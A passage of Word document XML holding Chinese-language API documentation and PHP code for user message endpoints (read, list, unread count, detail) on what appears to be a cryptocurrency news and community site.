    </w:p>
    <w:p w14:paraId="0355BB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0080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505E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43D7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/api/message/read </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读消息｜标记消息状态为已读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDFA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阅读消息｜标记消息状态为已读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3475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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068DB7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5CC3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0651A2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message_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C104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用户阅读消息成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD505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用户阅读消息失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36458E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2566D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6EBB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read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DF8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FA3E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444CF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$data['recipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAD1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BB34C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88CC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请先登录账号，然后加入消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF848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02029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A3E2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444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$data['id'] = input('param.message_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D124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($data['id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A99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D8DDE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用户消息</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0690E8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24BD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8E8C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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A4F9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0B06CF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1F4B6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(!empty($message)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2614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($message['read'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC1D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Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3981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7B33A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06D6FE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'read' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFD7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6DA7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C0BC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81563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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户阅读消息成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EEC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D170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E070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579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该用户消息不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569091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2260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DA3D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7C9D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/api/message/index </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5A9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获取当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EC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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A908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3ADEF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62BEE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type_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52010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read     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类是否已读（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未读；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已读）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED42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当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281E8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id             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376408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type_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6D1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type_name      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B62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article_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431AD3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circle_id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732E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circle_article_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F47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coin_name         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F365B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          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A8D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symbol            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B0E2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用户消息内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ECCD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link            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息相关链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149141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sender_username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392B3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sender_img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0364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当前用户是否关注该消息发送者：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733B7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create_time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA27B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update_time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息阅读时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105ED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20F667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27EA79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3186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2BF00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C605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4C83D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$data['recipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE9E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D4058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8882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49FC0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654001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7FE2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0F4A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input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319822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$read = input('param.read', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462C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($type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92C4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$data['type_id'] = $type_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129608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CE30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($read != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213189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$data['read'] = $read;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A7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951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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FD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0A823E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-&gt;order(['`read`' =&gt; 'asc', 'create_time' =&gt; 'desc'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419406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6C5F9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(count($my_messages) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54056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($my_messages as $key =&gt; $my_message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE3F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$my_messages[$key]['sender_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5BB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$my_messages[$key]['sender_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF46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$my_messages[$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA76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$sender = _user($my_message['sender_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABBF4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(!empty($sender)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1DB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$my_messages[$key]['sender_username'] = $sender['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780F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$my_messages[$key]['sender_img'] = $sender['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B78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248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91291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$my_messages[$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E71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$my_message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EC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531054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47B17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32EB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$my_messages[$key]['type_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49868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($my_message['type_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989C7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$my_messages[$key]['type_name'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF1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$my_message['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDDB0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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C01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791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/*$my_messages[$key]['coin_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE27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($my_message['coin_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FFEB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 = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F92A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$my_message['coin_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4C8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8FD7B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(!empty($coin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F71E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$my_messages[$key]['coin_name'] = $coin['currency'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F850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3D9A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68A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BED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DC54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json($my_messages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3B4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5FF7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A32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/api/message/unread_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92F3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获取当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A1B1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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201835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BBF50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57017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type_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483652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{Json} result           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718E4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unread_num    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F8D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0CC0DE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5E2B52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075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unread_num()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18360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AA34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89C67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$data['recipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03315A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773C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0E266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1888D9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4FCA7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C17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13D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 = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4B9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($type_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B3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$data['type_id'] = $type_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE41A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DB4C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$data['read'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641168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$unread_num = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC1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1D2E94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1F0BD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3B3F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'unread_num' =&gt; $unread_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB2B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F53A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C561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37A2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/api/message/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取消息详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068F8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获取消息详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DB9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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65F6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BA8B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428FF8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message_id    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E29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用户消息详情数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2B1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用户消息</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1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32C9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type_id             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BA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type_name           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E405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article_id          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069758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circle_id           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
